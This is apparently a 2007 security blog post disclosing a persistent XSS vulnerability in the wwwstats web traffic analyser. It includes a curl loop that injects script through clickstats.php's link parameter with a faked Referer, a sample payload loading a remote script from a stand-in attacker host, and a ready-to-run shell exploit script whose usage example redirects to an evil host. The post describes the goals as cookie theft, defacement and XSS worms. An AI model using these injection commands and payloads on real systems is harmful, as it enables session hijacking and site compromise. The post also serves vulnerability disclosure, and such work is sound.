jueves, diciembre 27, 2007

wwwstats vulnerable to Persistent XSS

wwwstats is a very widely used Web traffic analyser, that registers in a database the user agents, referers, downloads, etc ..

I discovered a way to inject HTML and JavaScript to the database by calling directly the clickstats.php code. This would mean mass defacing, steal admin sessions, web redirecting, WSS Worms, google-bombing and google-priorizing.

To bypass the first 'if', is necessary to fill the HTTP Referer field with something, and inject the link to the database by the link get parameter.

An attacker can inject using the link parameter or the useragent field a script which will steal admin's cookies, or make a deface, or anything else...

If magic quotes are configured at php.ini, there is no problem, in javascript \'test\' is interpreted as 'test'.

Controlling the iterations number, is possible to do the injection in the ranking position you want:

while [ 1 ]; do
curl
'http://web.com/wwwstats/clickstats.php?link=<script>XXXX</scrip>' -e
'xxx'; done

Also is possible to attack by user agent: -A 'attack'

A payload can be:

<script scr='http://evilsite.com/XSSWorm.js'></script>

------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com

if [ $# -ne 4 ]
then
echo "Usage: $0
<html or javascript to inject in downloads> "
echo "Example: $0 http://www.victym.com/wwwstats
<script>window.location="http://www.evilhost.com"</script> 100"
exit
fi

echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done


External links:
http://www.securityfocus.com/bid/26759
http://secunia.com/advisories/28002